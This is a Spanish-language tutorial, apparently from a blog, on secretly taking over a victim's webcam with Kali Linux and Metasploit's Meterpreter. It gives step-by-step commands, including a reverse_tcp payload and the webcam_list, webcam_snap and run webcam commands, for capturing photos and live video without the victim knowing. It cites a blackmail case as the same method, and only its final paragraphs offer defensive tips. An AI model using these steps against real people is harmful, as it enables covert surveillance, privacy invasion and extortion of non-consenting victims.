En este tutorial, echaremos un vistazo a cómo podemos hackear una cámara web en secreto y de forma remota a través de Internet y echaremos un vistazo a lo que está pasando en el otro lado. Usaremos el poderoso Meterpreter y Kali Linux para hackear la cámara web de la víctima. Tomaremos el control total de la cámara web, la encenderemos, obtendremos instantáneas e incluso transmitiremos videos en vivo sin que nadie se entere.
A principios de 2014, un hacker fue sentenciado a 18 meses por hacer esto a Miss Teen USA 2013. Encontró una vulnerabilidad en su computadora (como un software obsoleto), tomó algunas fotos comprometedoras de la cámara web y chantajeó a la víctima para que enviara más fotos. El método que usó es exactamente lo que probaremos aquí.
Nuestro mejor amigometerpreter
nos ayudará con este truco. Con Meterpreter podemos controlar la cámara web de alguien, instalar un keylogger o plantar sus propios virus, robar datos privados y hacer casi cualquier cosa en la computadora de la víctima.
Para este tutorial, asumo que ya has usado un módulo de ataque para explotar una vulnerabilidad usando Metasploit (¿Cómo hacer esto?). Ahora vamos a ello.
Cómo hackear cámaras web?
Paso 1: Configurar meterpreter.
Después de haber explotado con éxito a la víctima, ahora tenemos la opción de establecer una carga útil de nuestra elección. La carga le dice a metasploit qué hacer en la computadora de la víctima una vez que irrumpe. Meterpreter es nuestra carga. El siguiente comando configura nuestra carga útil:
set payload windows/meterpreter/reverse_tcp
Si el ataque fue exitoso, metasploit instala automáticamente meterpreter en el sistema objetivo y podemos pasar a hackear la cámara web.
Paso 2: Encuentra la cámara web.
Meterpreter tiene un módulo incorporado para buscar y controlar la cámara web del sistema remoto. Podemos comenzar buscando si el sistema tiene una cámara web o not.me El comando de abajo se usa para eso, también nos devuelve el nombre de la cámara web.
meterpreter > webcam_list
Y ahora debería ver la(s) cámara (s) de su objetivo en la salida.
Paso 3: Tomar instantáneas
Si el último comando nos dio una cámara web, podemos seguir adelante y tomar una foto:
meterpreter > webcam_snap
Y ahora debería ver que una imagen se ha guardado en la carpeta /opt/framework3/msf3
Simplemente diríjase hacia allí
Paso 4: Transmitir video en tiempo real desde la cámara web hackeada
Así que solo tomamos una foto, veamos cómo obtener una transmisión de video en vivo. Podemos hacer esto escribiendo el comando a continuación: (Estamos usando el parámetro –p
para especificar el directorio que queremos dar al archivo de transmisión de vídeo)
meterpreter > run webcam -p /var/www
Este comando activa la cámara web de la víctima y envía su salida de vídeo a /var/www/webcam.htm
. Puede abrir este archivo y ver lo que está pasando en el otro extremo en una transmisión de video en vivo.
¿Cómo evitar que su propia cámara web sea hackeada?
Hay varias formas de hackear cámaras web. En el ejemplo anterior, con solo unos pequeños comandos podemos echar un vistazo a la cámara web de nuestra víctima. Cualquier experto en seguridad experimentado le dirá que ningún sistema es completamente seguro. Esta es la razón por la que siempre debe mantener sus cámaras cubiertas cuando no estén en uso. Personalmente, uso este pequeño aparato tanto en mi computadora portátil como en mi teléfono inteligente.
Pero esto no significa que no deba molestarse en mantener actualizado su sistema operativo y aplicaciones, en realidad, todo lo contrario. Si un hacker puede obtener el control de su cámara web, su sistema ha sido explotado con éxito, ahora es efectivamente un bot, un esclavo del atacante. Esto significa que el atacante puede hacer cualquier cosa en su sistema: acceder a sus datos privados, ver todo lo que escribe, así como todos los sitios web que visita.
¿Qué dispositivo está utilizando en este momento? Un smartphone? ¿Un portátil? Lo más probable es que estés mirando directamente a una cámara. ¿De repente te sientes un poco incómodo? Deberías. No te arriesgues. Si simplemente cubre sus cámaras y actualiza rutinariamente todo su software, puede evitar ser víctima de un hackeo de cámara web usted mismo.